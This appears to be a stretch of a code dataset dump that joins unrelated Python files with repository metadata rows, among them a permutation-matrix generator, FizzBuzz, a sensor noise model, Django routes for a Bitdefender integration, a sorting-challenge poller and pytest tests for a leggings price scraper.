(6, 1, 2, 7, 5, 4, 0, 3),
(7, 5, 6, 2, 0, 4, 1, 3),
(5, 3, 2, 7, 0, 4, 6, 1),
(2, 6, 5, 0, 1, 3, 7, 4),
(2, 4, 5, 3, 0, 1, 7, 6),
(4, 0, 2, 1, 6, 3, 7, 5),
(5, 0, 6, 2, 3, 4, 7, 1),
(0, 2, 6, 7, 3, 5, 1, 4),
(3, 4, 0, 7, 2, 1, 6, 5),
(1, 2, 4, 3, 5, 7, 6, 0),
(5, 2, 4, 7, 1, 3, 0, 6),
(7, 5, 1, 3, 6, 0, 4, 2),
(4, 6, 1, 3, 5, 2, 7, 0),
(0, 5, 3, 1, 4, 2, 6, 7),
(2, 3, 1, 4, 5, 6, 7, 0),
(6, 1, 0, 7, 2, 5, 4, 3),
(3, 6, 1, 7, 0, 4, 5, 2),
(4, 7, 2, 3, 1, 0, 5, 6),
(1, 2, 3, 4, 6, 5, 7, 0),
(5, 4, 3, 1, 2, 0, 7, 6),
(6, 0, 4, 7, 5, 2, 3, 1),
(2, 6, 5, 4, 0, 1, 3, 7),
(1, 3, 4, 5, 0, 2, 6, 7),
(0, 5, 6, 7, 2, 1, 4, 3),
(2, 1, 6, 0, 3, 7, 4, 5),
(6, 7, 5, 3, 2, 0, 1, 4),
(0, 7, 2, 5, 6, 1, 4, 3),
(1, 6, 0, 5, 7, 2, 4, 3),
(5, 1, 6, 4, 2, 7, 0, 3),
(6, 3, 1, 0, 2, 4, 7, 5),
(3, 1, 7, 4, 5, 0, 6, 2),
(4, 6, 7, 5, 1, 2, 3, 0),
(7, 1, 2, 6, 3, 4, 0, 5),
(3, 6, 7, 2, 1, 4, 0, 5),
(7, 6, 0, 5, 1, 4, 2, 3),
(2, 5, 3, 1, 7, 4, 6, 0),
(7, 5, 2, 6, 3, 1, 4, 0),
(0, 3, 5, 2, 6, 7, 1, 4),
(1, 6, 5, 2, 3, 7, 0, 4),
(4, 0, 1, 3, 6, 7, 2, 5),
(6, 4, 3, 5, 0, 7, 1, 2),
(1, 0, 3, 7, 2, 5, 4, 6),
(2, 5, 0, 1, 3, 7, 6, 4),
(3, 2, 1, 5, 7, 4, 6, 0),
(1, 3, 6, 7, 0, 4, 2, 5),
(5, 0, 4, 3, 2, 1, 7, 6),
(6, 0, 3, 7, 4, 5, 1, 2),
(5, 1, 0, 3, 4, 2, 7, 6),
(6, 4, 0, 2, 5, 3, 1, 7),
(7, 2, 4, 5, 0, 1, 6, 3),
(0, 1, 3, 4, 2, 6, 7, 5),
(3, 6, 5, 7, 0, 2, 1, 4),
(2, 1, 4, 6, 5, 7, 0, 3),
(6, 4, 7, 0, 5, 3, 2, 1),
(6, 3, 7, 4, 1, 2, 0, 5),
(3, 4, 5, 6, 2, 7, 0, 1),
(5, 3, 1, 6, 4, 0, 7, 2),
(1, 4, 0, 3, 2, 5, 6, 7),
(3, 1, 7, 6, 4, 5, 0, 2),
(3, 4, 0, 5, 7, 6, 2, 1),
(3, 4, 0, 6, 7, 2, 1, 5),
(7, 2, 1, 3, 0, 5, 6, 4),
(2, 1, 5, 7, 0, 3, 4, 6),
(6, 3, 7, 5, 0, 1, 4, 2),
(0, 1, 2, 6, 4, 5, 7, 3),
(4, 7, 5, 6, 2, 1, 0, 3),
(3, 4, 6, 7, 1, 2, 5, 0),
(6, 0, 7, 2, 3, 4, 1, 5),
(5, 4, 6, 3, 1, 2, 0, 7),
(7, 1, 2, 4, 0, 6, 3, 5),
(7, 4, 5, 1, 3, 0, 2, 6),
(6, 2, 4, 5, 0, 7, 3, 1),
(5, 6, 3, 2, 1, 7, 4, 0),
(0, 1, 4, 7, 2, 5, 6, 3),
(7, 6, 2, 5, 3, 4, 0, 1),
(6, 5, 4, 7, 2, 1, 3, 0),
(6, 2, 1, 3, 4, 0, 7, 5),
(5, 0, 7, 3, 1, 4, 2, 6),
(5, 6, 2, 0, 7, 4, 1, 3),
(5, 7, 3, 0, 6, 2, 1, 4),
(3, 1, 7, 4, 5, 0, 2, 6),
(4, 0, 7, 6, 3, 5, 1, 2),
(5, 4, 0, 3, 2, 7, 1, 6),
(5, 3, 2, 1, 6, 0, 4, 7),
(3, 1, 7, 6, 4, 2, 5, 0),
(0, 3, 5, 1, 7, 6, 2, 4),
(6, 4, 1, 7, 2, 5, 0, 3),
(7, 2, 6, 4, 5, 3, 0, 1),
(5, 1, 3, 4, 2, 6, 7, 0),
(6, 1, 7, 0, 5, 3, 2, 4),
(4, 6, 0, 1, 2, 3, 5, 7),
(3, 4, 0, 2, 7, 1, 6, 5),
(5, 1, 2, 0, 4, 3, 7, 6),
(5, 1, 3, 0, 4, 7, 2, 6),
(3, 7, 1, 2, 5, 0, 6, 4),
(6, 5, 2, 1, 3, 4, 0, 7),
(3, 4, 7, 6, 5, 0, 2, 1),
(5, 1, 3, 7, 4, 2, 6, 0),
(6, 4, 0, 7, 3, 2, 5, 1),
(0, 2, 4, 3, 6, 7, 1, 5),
(5, 0, 7, 6, 4, 1, 3, 2),
(4, 6, 7, 2, 3, 5, 1, 0),
(1, 0, 5, 3, 6, 7, 4, 2),
(1, 4, 7, 6, 0, 3, 5, 2),
(7, 3, 4, 6, 5, 1, 2, 0),
(1, 3, 0, 6, 7, 4, 2, 5),
(5, 4, 6, 1, 2, 0, 7, 3),
(5, 3, 1, 0, 4, 2, 6, 7),
(7, 1, 4, 0, 3, 2, 5, 6),
(1, 2, 3, 7, 5, 6, 0, 4),
(7, 6, 3, 4, 5, 0, 1, 2),
(7, 0, 5, 6, 1, 4, 2, 3),
(0, 3, 7, 1, 6, 4, 2, 5),
(6, 0, 3, 1, 5, 2, 4, 7),
(7, 1, 4, 6, 3, 2, 0, 5),
(4, 5, 2, 7, 6, 0, 1, 3),
(3, 4, 0, 5, 7, 2, 6, 1),
(4, 3, 7, 6, 2, 5, 0, 1),
(4, 2, 1, 3, 7, 6, 5, 0),
(6, 0, 2, 5, 7, 3, 4, 1),
(4, 1, 5, 6, 7, 0, 3, 2),
(5, 6, 0, 2, 4, 3, 1, 7),
(0, 1, 2, 4, 5, 3, 7, 6),
(7, 0, 5, 1, 4, 6, 3, 2),
(5, 6, 7, 4, 0, 1, 3, 2),
(4, 6, 1, 5, 7, 3, 0, 2),
(1, 2, 7, 4, 0, 3, 5, 6),
(5, 6, 3, 0, 1, 2, 4, 7),
(3, 4, 6, 2, 7, 5, 0, 1),
(3, 4, 0, 6, 5, 2, 1, 7),
(6, 5, 0, 7, 1, 3, 4, 2),
(3, 0, 4, 6, 7, 2, 5, 1),
(1, 0, 2, 3, 4, 5, 6, 7),
(6, 7, 1, 0, 4, 3, 2, 5),
(1, 5, 3, 6, 4, 0, 2, 7),
(1, 0, 2, 3, 7, 4, 6, 5),
(7, 3, 2, 6, 5, 1, 4, 0),
(7, 5, 0, 6, 1, 2, 3, 4),
(0, 5, 3, 7, 2, 6, 4, 1),
(5, 7, 3, 4, 0, 2, 1, 6),
(1, 0, 4, 5, 2, 7, 3, 6),
(4, 5, 1, 3, 6, 0, 2, 7),
(6, 3, 7, 0, 4, 2, 5, 1),
(2, 4, 3, 6, 5, 1, 0, 7),
(4, 0, 7, 3, 5, 1, 6, 2),
(7, 3, 6, 4, 1, 2, 5, 0),
(7, 6, 5, 3, 1, 0, 4, 2),
(5, 4, 0, 6, 7, 2, 3, 1),
(7, 4, 0, 3, 1, 5, 6, 2),
(5, 6, 3, 0, 7, 2, 4, 1),
(0, 2, 7, 5, 6, 4, 3, 1),
(1, 6, 4, 2, 5, 3, 7, 0),
(6, 2, 3, 7, 0, 4, 5, 1),
(4, 7, 5, 2, 1, 6, 3, 0),
(4, 3, 0, 5, 1, 6, 7, 2),
(1, 6, 0, 7, 4, 3, 2, 5),
(0, 2, 6, 5, 4, 3, 1, 7),
(2, 5, 6, 7, 1, 0, 4, 3),
(2, 3, 6, 4, 1, 5, 0, 7),
(4, 7, 3, 6, 0, 1, 5, 2),
(5, 2, 6, 3, 7, 4, 1, 0),
(0, 3, 6, 5, 1, 7, 2, 4),
(0, 7, 6, 1, 4, 5, 3, 2),
(4, 3, 2, 1, 6, 7, 0, 5),
(7, 1, 6, 3, 0, 5, 4, 2),
(2, 6, 3, 7, 4, 0, 5, 1),
(7, 1, 2, 5, 3, 0, 4, 6),
(2, 5, 6, 7, 4, 1, 3, 0),
(6, 0, 1, 2, 4, 5, 7, 3),
(5, 3, 1, 2, 0, 7, 4, 6),
(7, 5, 2, 3, 6, 0, 4, 1),
(1, 7, 4, 3, 5, 6, 0, 2),
(5, 0, 4, 2, 6, 3, 7, 1),
(0, 5, 3, 7, 2, 4, 6, 1),
(1, 4, 0, 7, 3, 5, 2, 6),
(6, 1, 7, 3, 4, 0, 2, 5),
(6, 0, 5, 2, 3, 4, 1, 7),
(0, 3, 1, 4, 2, 6, 7, 5),
(3, 4, 1, 5, 7, 0, 2, 6),
(3, 7, 2, 4, 5, 6, 0, 1),
(1, 2, 3, 4, 5, 7, 6, 0),
(2, 4, 3, 7, 1, 0, 6, 5),
(3, 7, 4, 2, 0, 5, 6, 1),
(3, 1, 0, 6, 7, 2, 5, 4),
(5, 7, 0, 6, 3, 4, 2, 1),
(5, 1, 3, 0, 7, 2, 4, 6),
(3, 2, 6, 7, 5, 4, 0, 1),
(7, 2, 6, 3, 5, 0, 4, 1),
(4, 3, 6, 5, 1, 0, 7, 2),
(2, 4, 6, 1, 3, 5, 0, 7),
(2, 0, 5, 3, 6, 4, 1, 7),
(0, 3, 1, 2, 6, 4, 7, 5),
(6, 2, 5, 3, 0, 4, 1, 7),
(3, 7, 0, 4, 6, 1, 5, 2),
(2, 7, 3, 6, 0, 5, 1, 4),
(1, 4, 3, 5, 6, 2, 7, 0),
(7, 2, 6, 0, 4, 1, 5, 3),
(4, 2, 7, 5, 0, 6, 3, 1),
(1, 2, 7, 0, 3, 4, 5, 6),
(2, 4, 7, 6, 5, 1, 0, 3),
(5, 7, 0, 2, 6, 3, 4, 1),
(2, 5, 6, 4, 3, 1, 7, 0),
(1, 6, 4, 0, 7, 3, 5, 2),
(1, 4, 5, 7, 6, 3, 2, 0),
(6, 0, 1, 2, 7, 4, 3, 5),
(2, 4, 7, 1, 0, 5, 3, 6)]
def generate_permatrix():
global MATRIX
l = list(range(8))
perm_set = set()
while len(perm_set) < 256:
random.shuffle(l)
perm_set.add(tuple(l))
MATRIX = list(perm_set)
for i in MATRIX:
print(str(i) + ",")
def generate_server_permatrix():
global MATRIX
for i in range(len(MATRIX)):
elem = np.zeros((8,8), dtype=np.uint8)
for j in range(8):
elem[j, MATRIX[i].index(j)] = 1
MATRIX[i] = elem
generate_server_permatrix()
| 25.329787 | 40 | 0.332773 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 | 0.00042 |
d30b795c9226a01b00b0c97716ea79f079c0f816 | 453 | py | Python | fizzbuzz.py | harman31/TwilioQuest | 9471bdc17bf2843a916576a52b45ee5b504378ab | [
"Unlicense"
] | null | null | null | fizzbuzz.py | harman31/TwilioQuest | 9471bdc17bf2843a916576a52b45ee5b504378ab | [
"Unlicense"
] | null | null | null | fizzbuzz.py | harman31/TwilioQuest | 9471bdc17bf2843a916576a52b45ee5b504378ab | [
"Unlicense"
] | null | null | null | import sys
# Set up a list for our code to work with that omits the first CLI argument,
# which is the name of our script (fizzbuzz.py)
inputs = sys.argv
inputs.pop(0)
# Process the "inputs" list as directed in your code
inputs = [int(x) for x in sys.argv[0:]]
for x in inputs:
if x % 3 == 0 and x % 5 == 0:
print("fizzbuzz")
elif x % 3 == 0:
print("fizz")
elif x % 5 == 0:
print("buzz")
else:
print(x) | 25.166667 | 77 | 0.589404 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 198 | 0.437086 |
d30c5430832f65f46617b5e3e3d5b2e83f6f709d | 2,414 | py | Python | robotics/simulators/sensor_model.py | bkolligs/robotics-prototyping | ac7766921c7e8b2c51792697ddf2166ab9a46c82 | [
"MIT"
] | 3 | 2021-06-20T15:40:57.000Z | 2021-11-11T03:20:29.000Z | robotics/simulators/sensor_model.py | bkolligs/robotics-prototyping | ac7766921c7e8b2c51792697ddf2166ab9a46c82 | [
"MIT"
] | 3 | 2021-07-06T01:31:51.000Z | 2021-07-31T00:05:39.000Z | robotics/simulators/sensor_model.py | bkolligs/robotics-prototyping | ac7766921c7e8b2c51792697ddf2166ab9a46c82 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
# sensor object to inherit for different sensors
class Sensor:
def __init__(self, name, mean, cov, state):
self.name_ = name
# add the sensor noise characteristics
self.mean_ = mean
self.cov_ = cov
self.H = None
self.stateSize_ = state.shape[0]
# simulate an update step
def measure(self, state):
# h(x) is the measurement model based off of the state
measurement = self.model(state) + np.random.normal(self.mean_, self.cov_)
return measurement
# the sensor model function producing prediction h(x)
def model(self, state):
# return the x value of the current state
prediction = np.zeros_like(state)
if self.H is not None:
# perform the prediction based on the state
prediction = self.H @ state
else:
# alert user if H is undefined
print("Sensor jacobian H is not defined for {0}".format(self.name_))
return prediction
def innovation(self, predict, measurement):
return measurement - predict
# plot a function with the current sensor noise model
def testPlot(self, function=lambda x: 2*x, start=0, end=1, step=100, plot=True):
# create an array of x values to graph
x = np.linspace(start, end, step)
signal = function(x)
# corrupt the sensor
mu = np.random.normal(self.mean_, self.cov_, size=x.shape)
# plot the sensor readings
if plot:
plt.plot(x, signal, "r", label="signal")
plt.plot(x, signal + mu, "b", label="noise")
plt.title("Noise Sample for Sensor {0}".format(self.name_))
plt.legend()
plt.show()
return signal, signal + mu
class OdometrySensor(Sensor):
def __init__(self, name, mean, cov, state):
super().__init__(name, mean, cov, state)
# the odometer senses (indirectly) the movement in the x direction
self.H = np.zeros(self.stateSize_)
self.H[0] = 1
class GyroSensor(Sensor):
def __init__(self, name, mean, cov, state):
super().__init__(name, mean, cov, state)
# the gyro is detecting the yaw
self.H = np.zeros(self.stateSize)
self.H[2] = 1
if __name__ == '__main__':
sense = Sensor("odom", 0, 0.2, np.zeros(3))
sense.testPlot() | 33.527778 | 84 | 0.610605 | 2,217 | 0.918393 | 0 | 0 | 0 | 0 | 0 | 0 | 674 | 0.279205 |
d30c75900993a0da1695f71222f8a200a1c99170 | 52 | py | Python | tests/__init__.py | frenck/python-ambee | 0a03b66d2fd4aca789a44874365bf85ac3469b23 | [
"MIT"
] | 6 | 2021-06-08T19:27:01.000Z | 2022-02-11T00:28:11.000Z | tests/__init__.py | frenck/python-ambee | 0a03b66d2fd4aca789a44874365bf85ac3469b23 | [
"MIT"
] | 200 | 2021-06-08T19:54:54.000Z | 2022-03-30T08:15:20.000Z | tests/__init__.py | frenck/python-ambee | 0a03b66d2fd4aca789a44874365bf85ac3469b23 | [
"MIT"
] | 4 | 2021-06-14T18:04:06.000Z | 2022-02-11T00:28:14.000Z | """Asynchronous Python client for the Ambee API."""
| 26 | 51 | 0.730769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 51 | 0.980769 |
d30d285c95be78b147e1c63701ce89103c7e9604 | 458 | py | Python | Singleton.py | cxwithyxy/PythonSingleton | 6a3b83dccb90548a2324914d3c9c96dcee9c5008 | [
"MIT"
] | null | null | null | Singleton.py | cxwithyxy/PythonSingleton | 6a3b83dccb90548a2324914d3c9c96dcee9c5008 | [
"MIT"
] | null | null | null | Singleton.py | cxwithyxy/PythonSingleton | 6a3b83dccb90548a2324914d3c9c96dcee9c5008 | [
"MIT"
] | null | null | null | #coding:utf-8
import threading
class Singleton(object):
def __new__(cls, *args, **kwargs):
lock = threading.Lock()
lock.acquire()
if not hasattr(cls, "_instance"):
cls._instance = object.__new__(cls)
cls._instance.__Singleton_Init__(*args, **kwargs)
lock.release()
return cls._instance
def __Singleton_Init__(self):
raise RuntimeError("__Singleton_Init__ must be overwritten") | 30.533333 | 68 | 0.641921 | 427 | 0.932314 | 0 | 0 | 0 | 0 | 0 | 0 | 64 | 0.139738 |
d30e8ef63f3e0580a4e7dd8d495cc791edee4584 | 661 | py | Python | api/tacticalrmm/integrations/bitdefender/urls.py | subzdev/tacticalrmm | 21d8899e9a01f0939ab908e82e1205fa7b632caf | [
"MIT"
] | 1 | 2021-12-29T07:20:57.000Z | 2021-12-29T07:20:57.000Z | api/tacticalrmm/integrations/bitdefender/urls.py | subzdev/tacticalrmm | 21d8899e9a01f0939ab908e82e1205fa7b632caf | [
"MIT"
] | null | null | null | api/tacticalrmm/integrations/bitdefender/urls.py | subzdev/tacticalrmm | 21d8899e9a01f0939ab908e82e1205fa7b632caf | [
"MIT"
] | 1 | 2021-12-29T05:55:53.000Z | 2021-12-29T05:55:53.000Z | from django.urls import path, include
from . import views
urlpatterns = [
path('endpoints/', views.GetEndpoints.as_view()),
path('endpoint/<str:endpoint_id>/', views.GetEndpoint.as_view()),
path('packages/', views.GetPackages.as_view()),
path('endpoint/quickscan/<str:endpoint_id>/', views.GetQuickScan.as_view()),
path('endpoint/fullscan/<str:endpoint_id>/', views.GetFullScan.as_view()),
path('endpoint/quarantine/<str:endpoint_id>/', views.GetEndpointQuarantine.as_view()),
path('quarantine/', views.GetQuarantine.as_view()),
path('tasks/', views.GetTasks.as_view()),
path('reports/', views.GetReportsList.as_view())
] | 44.066667 | 90 | 0.708018 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 200 | 0.302572 |
d30ef59b6bfbce01484200ba0d96a79b9b8117f5 | 670 | py | Python | libcoop.py | jethornton/coop4 | 5cdbbbb089399ba036798e92887c8ed265d887d0 | [
"MIT"
] | null | null | null | libcoop.py | jethornton/coop4 | 5cdbbbb089399ba036798e92887c8ed265d887d0 | [
"MIT"
] | null | null | null | libcoop.py | jethornton/coop4 | 5cdbbbb089399ba036798e92887c8ed265d887d0 | [
"MIT"
] | null | null | null | class Ledfade:
def __init__(self, *args, **kwargs):
if 'start' in kwargs:
self.start = kwargs.get('start')
if 'end' in kwargs:
self.end = kwargs.get('end')
if 'action' in kwargs:
self.action = kwargs.get('action')
self.transit = self.end - self.start
def ledpwm(self, p):
c = 0.181+(0.0482*p)+(0.00323*p*p)+(0.0000629*p*p*p)
if c < 0.0:
return 0
if c > 0.0 and c <= 100.0:
return c
elif c > 100.0:
return 100
def update(self, now):
if self.action == 'sunrise':
return self.ledpwm(((now - self.start) / self.transit) * 100)
elif self.action == 'sunset':
return self.ledpwm(100 - ((now - self.start) / self.transit) * 100)
| 26.8 | 70 | 0.613433 | 669 | 0.998507 | 0 | 0 | 0 | 0 | 0 | 0 | 57 | 0.085075 |
d310ad1d90c8db21e7972f44e9934db99a3126dd | 6,612 | py | Python | challenges/Sorter/poller/for-release/machine.py | pingjuiliao/cb-multios | 64ededd0b87030eda7c40c4388a4ad8283712d8e | [
"MIT"
] | 473 | 2016-08-01T12:48:16.000Z | 2022-03-09T18:13:14.000Z | challenges/Sorter/poller/for-release/machine.py | pingjuiliao/cb-multios | 64ededd0b87030eda7c40c4388a4ad8283712d8e | [
"MIT"
] | 71 | 2016-08-01T03:33:44.000Z | 2022-03-09T18:37:04.000Z | challenges/Sorter/poller/for-release/machine.py | pingjuiliao/cb-multios | 64ededd0b87030eda7c40c4388a4ad8283712d8e | [
"MIT"
] | 121 | 2016-08-01T04:07:53.000Z | 2022-03-07T11:08:09.000Z | from generator.actions import Actions
import random
import string
import struct
import numpy as np
import math
import datetime as dt
import ctypes
def kaprica_mixin(self):
if hasattr(self, 'xlat_seed'):
return
def xlat_seed(seed):
def hash_string(seed):
H = 0x314abc86
for c in seed:
H = (H * 37) & 0xffffffff
H ^= ord(c)
H = ((H << 13) ^ (H >> 19)) & 0xffffffff
return H
def hash_iterate(H):
H = (H * 3) & 0xffffffff
H = ((H << 13) ^ (H >> 19) ^ (H >> 21)) & 0xffffffff
return H
xmap = list(xrange(256))
xmap_inv = list(xrange(256))
state = hash_string(seed)
for i in xrange(255, 0, -1):
j = state % i
state = hash_iterate(state)
xmap[i], xmap[j] = xmap[j], xmap[i]
for i in xrange(256):
xmap_inv[xmap[i]] = i
self.xlat_map = xmap
self.xlat_map_inv = xmap_inv
self.xlat_seed = xlat_seed
self.xlat_map = None
self.xlat_map_inv = None
def xlat_string(s, inverse=False):
if inverse:
return ''.join([chr(self.xlat_map_inv[ord(c)]) for c in s])
return ''.join([chr(self.xlat_map[ord(c)]) for c in s])
self.xlat_string = xlat_string
def read(delim=None, length=None, expect=None):
if self.xlat_map:
if delim:
delim = self.xlat_string(delim)
if expect:
expect = self.xlat_string(expect)
return self._original_read(delim=delim, length=length, expect=expect)
self._original_read = self.read
self.read = read
def write(s):
if self.xlat_map:
if s:
s = self.xlat_string(s)
return self._original_write(s)
self._original_write = self.write
self.write = write
def random_word(max_size=10, min_size=2):
if random.randint(0,4):
characters = string.letters + string.digits
else:
characters = string.letters
max_size = max_size if max_size >= min_size else min_size
max_size = random.randint(min_size, max_size)
return ("".join(random.choice(characters) for c in range(max_size))).lower()
def random_text(max_words=10, min_words=3):
max_words = max_words if max_words >= min_words else min_words
text = ''
for x in xrange(random.randint(min_words, max_words)):
text += random_word() + ' '
return text
class Cs10Fun(Actions):
def _read(self, data):
self.read(length=len(data), expect=data)
def _read_array(self, array=None):
if not array:
array = self._cur_array
if not len(array):
self._read("Empty Array\n")
else:
self._read("Array data\n")
temp_list = []
for val in array:
temp_list.append("%d, " % val)
temp_list[-1] = temp_list[-1][:-2]
self._read("[" + ''.join(temp_list) + ']\n')
def start(self):
#self.delay(100)
kaprica_mixin(self)
self.xlat_seed('2e0715f1709c')
self.write(self.magic_page[:4])
self.read(length=0x1000, expect=self.magic_page)
self._cur_array = []
self._read("Welcome to CS10Fun!\n")
self._read("Today's lesson is on sorting! We're going to cover 4 types of sorts.\n")
self._read("Before we begin, create an array of ints\n")
self.menu()
self.enter_array()
def menu(self):
self._read("Main Menu\n")
self._read("1. Enter Array\n")
self._read("2. Multiply Array\n")
self._read("3. Try Insertion Sort\n")
self._read("4. Try Selection Sort\n")
self._read("5. Try Heap Sort\n")
self._read("6. Try Merge Sort\n")
self._read("7. Reprint Array\n")
self._read("0. Exit\n")
self._read(" -----\n")
self._read("Current Number of items in array = %d\n" % len(self._cur_array))
#self._read_array()
self._read(" -----\n")
self._read("Make a selection\n")
def enter_array(self):
self.write('1\n')
self._read("Enter a list of numbers to sort. End the list with ';;'\n")
self._cur_array = []
for x in xrange(random.randint(1,100)):
self._cur_array.append(random.randint(-1000000000, 1000000000))
self.write(','.join([str(x) for x in self._cur_array]) + ',;;\n')
self._read("New Array\n")
self._read("Number of items in array = %d\n" % len(self._cur_array))
self._read_array()
def multiply_array(self):
self.write('2\n')
if len(self._cur_array) > 10000:
self._read("Array is too long. Can't multiply any more\n")
elif len(self._cur_array):
self._read("Quick Grow! Enter a list multiplier. End number with ';'\n")
multiplier = random.randint(1,3)
while multiplier * len(self._cur_array) > 1024 and multiplier * len(self._cur_array) <= 1048:
multiplier = random.randint(1,3)
self.write("%d;\n" % multiplier)
self._cur_array *= multiplier
self._read("Multiplied Array\n")
self._read("Number of items in array = %d\n" % len(self._cur_array))
self._read_array()
def insert_sort(self):
self.write('3\n')
self._read_array(sorted(self._cur_array))
#self.read(expect='Insertion sort takes [\d]+ operations\n', expect_format='pcre', delim='\n')
self.read(delim='\n')
def selection_sort(self):
self.write('4\n')
self._read_array(sorted(self._cur_array))
#self.read(expect='Selection sort takes [\d]+ operations\n', expect_format='pcre', delim='\n')
self.read(delim='\n')
def heap_sort(self):
self.write('5\n')
self._read_array(sorted(self._cur_array))
#self.read(expect='Heap sort takes [\d]+ operations\n', expect_format='pcre', delim='\n')
self.read(delim='\n')
def merge_sort(self):
self.write('6\n')
self._read_array(sorted(self._cur_array))
#self.read(expect='Merge sort takes [\d]+ operations\n', expect_format='pcre', delim='\n')
self.read(delim='\n')
def reprint_array(self):
self.write('7\n')
self._read("Current Array\n")
self._read("Number of items in array = %d\n" % len(self._cur_array))
self._read_array()
def exit(self):
self.write('0\n')
self._read("Thanks for joining us\n")
self._read("See you next time\n")
| 34.259067 | 105 | 0.576528 | 4,114 | 0.622202 | 0 | 0 | 0 | 0 | 0 | 0 | 1,314 | 0.19873 |
d310ad4131bb13a49700299f40080306d0be5ffa | 267 | py | Python | KanoTerminator.py | JJFReibel/KanoTerminator | 2de8b310fcf39b270d0d65dfb18c26ed8b2b621b | [
"MIT"
] | null | null | null | KanoTerminator.py | JJFReibel/KanoTerminator | 2de8b310fcf39b270d0d65dfb18c26ed8b2b621b | [
"MIT"
] | null | null | null | KanoTerminator.py | JJFReibel/KanoTerminator | 2de8b310fcf39b270d0d65dfb18c26ed8b2b621b | [
"MIT"
] | null | null | null | # Kano or Terminator
# By Jean-Jacques F. Reibel
# I will not be held responsible for:
# any shenanigans
import os
# ಠ_ಠ
# ¯¯\_(ツ)_/¯¯
# (╭ರ_•́)
os.system("printf '\e[0;35;1;1m (╭ರ_'")
os.system("printf '\e[0;31;1;5m°'")
os.system("printf '\e[0;35;1;1m)\n'")
| 20.538462 | 46 | 0.599251 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 235 | 0.813149 |
d311d6b8624998ffd42ae72c0e0a5667ee9aa1ef | 4,754 | py | Python | tests/test_leggins_list.py | ButterflyBug/Affordable-leggins | 0031fb06796e47c6fbf7b38fd226d0365c2ca98f | [
"MIT"
] | 3 | 2019-10-17T09:52:46.000Z | 2020-12-28T10:41:34.000Z | tests/test_leggins_list.py | ButterflyBug/Affordable-leggins | 0031fb06796e47c6fbf7b38fd226d0365c2ca98f | [
"MIT"
] | 2 | 2019-10-29T21:09:44.000Z | 2021-06-10T18:11:50.000Z | tests/test_leggins_list.py | ButterflyBug/Affordable-leggins | 0031fb06796e47c6fbf7b38fd226d0365c2ca98f | [
"MIT"
] | null | null | null | import pytest
from affordable_leggins.leggins_list import get_rrp_from_single_site
from affordable_leggins.leggins_list import get_list_of_leggins_from_page
from affordable_leggins.leggins_list import get_list_of_leggins
from affordable_leggins.store import store_data, read_data, read_data_from_database
from affordable_leggins.storage.models import Leggin, Size
import json
import os
import datetime
@pytest.mark.vcr("tests/cassettes/test_leggins_list/test_get_list_of_leggins.yaml")
def test_get_rrp_from_single_site_when_rrp_available():
""" Test function when rrp found on the website """
assert get_rrp_from_single_site(12068050) == 179.0
@pytest.mark.vcr("tests/cassettes/test_leggins_list/test_get_list_of_leggins.yaml")
def test_get_rrp_from_single_site_when_rrp_not_available():
""" Test function when there is no rrp """
assert get_rrp_from_single_site(12053031) is None
@pytest.mark.vcr()
def test_get_rrp_from_single_site_when_leggin_not_available():
""" Test function when there is no product """
assert get_rrp_from_single_site(99999999) is None
@pytest.mark.vcr("tests/cassettes/test_leggins_list/test_get_list_of_leggins.yaml")
def test_get_list_of_leggins_from_existing_page():
""" Test function when page exists """
single_leggin = {
"leggin_id": "12068050",
"leggin_name": "Legginsy Curve - Szare",
"leggin_price": 162.0,
"leggin_rrp": 179.0,
"sizes": ["XXS", "XS", "S", "M", "L", "XL", "XXL"],
}
matched_leggin = list(
filter(
lambda leggin: leggin["leggin_id"] == "12068050",
get_list_of_leggins_from_page(1),
)
)
assert matched_leggin[0] == single_leggin
@pytest.mark.vcr()
def test_get_list_of_leggins_from_nonexisting_page():
""" Test function when page does not exist """
assert get_list_of_leggins_from_page(120) == []
@pytest.mark.vcr("tests/cassettes/test_leggins_list/test_get_list_of_leggins.yaml")
def test_get_list_of_leggins():
"""
Test if leggin from available pages can be found
in a list of all leggins
"""
list_of_leggins = get_list_of_leggins()
leggin_from_first_page = {
"leggin_id": "12068050",
"leggin_name": "Legginsy Curve - Szare",
"leggin_price": 162.0,
"leggin_rrp": 179.0,
"sizes": ["XXS", "XS", "S", "M", "L", "XL", "XXL"],
}
leggin_from_second_page = {
"leggin_name": "Dżersejowe Legginsy MP - Danger",
"leggin_id": "12459914",
"leggin_price": 119.0,
"leggin_rrp": 119.0,
"sizes": ["L", "XL", "XXL"],
}
assert leggin_from_first_page in list_of_leggins
assert leggin_from_second_page in list_of_leggins
@pytest.mark.vcr("tests/cassettes/test_leggins_list/test_get_list_of_leggins.yaml")
def test_store_data():
"""Tests if file with data is created and checks existing of a product"""
leggin_in_file = {
"leggin_id": "12068050",
"leggin_name": "Legginsy Curve - Szare",
"leggin_price": 162.0,
"leggin_rrp": 179.0,
"sizes": ["XXS", "XS", "S", "M", "L", "XL", "XXL"],
}
file = store_data("tests/data/test_leggins_list")
file_path = os.path.abspath(file.name)
opened_file = open(file_path, "r")
loaded_elements = json.load(opened_file)
assert leggin_in_file in loaded_elements
def test_read_data():
leggin = {
"leggin_name": "Legginsy siatkowe Power",
"leggin_id": "11869780",
"leggin_price": 179.0,
"leggin_rrp": 179.0,
}
leggins_list = read_data("tests/data/test_leggins_list", "04", "06", "2019")
assert leggins_list[1] == leggin
def test_read_data_with_integer_values():
leggin = {
"leggin_name": "Legginsy siatkowe Power",
"leggin_id": "11869780",
"leggin_price": 179.0,
"leggin_rrp": 179.0,
}
leggins_list = read_data("tests/data/test_leggins_list", 4, 6, 2019)
assert leggins_list[1] == leggin
@pytest.mark.django_db
def test_read_data_from_database():
leggin = Leggin()
leggin.name = "Legginsy siatkowe Power"
leggin.external_id = "11869780"
leggin.price = 179.0
leggin.rrp = 179.0
leggin.date = datetime.date(2020, 3, 22)
leggin.save()
size = Size()
size.name = "S"
size.save()
leggin.sizes.add(size)
converted_leggin = {
"leggin_name": "Legginsy siatkowe Power",
"leggin_id": 11869780,
"leggin_price": 179.0,
"leggin_rrp": 179.0,
"sizes": ["S"],
}
assert read_data_from_database(22, 3, 2020) == [converted_leggin]
@pytest.mark.django_db
def test_read_data_from_database_non_existing_data():
assert read_data_from_database(22, 3, 2050) == []
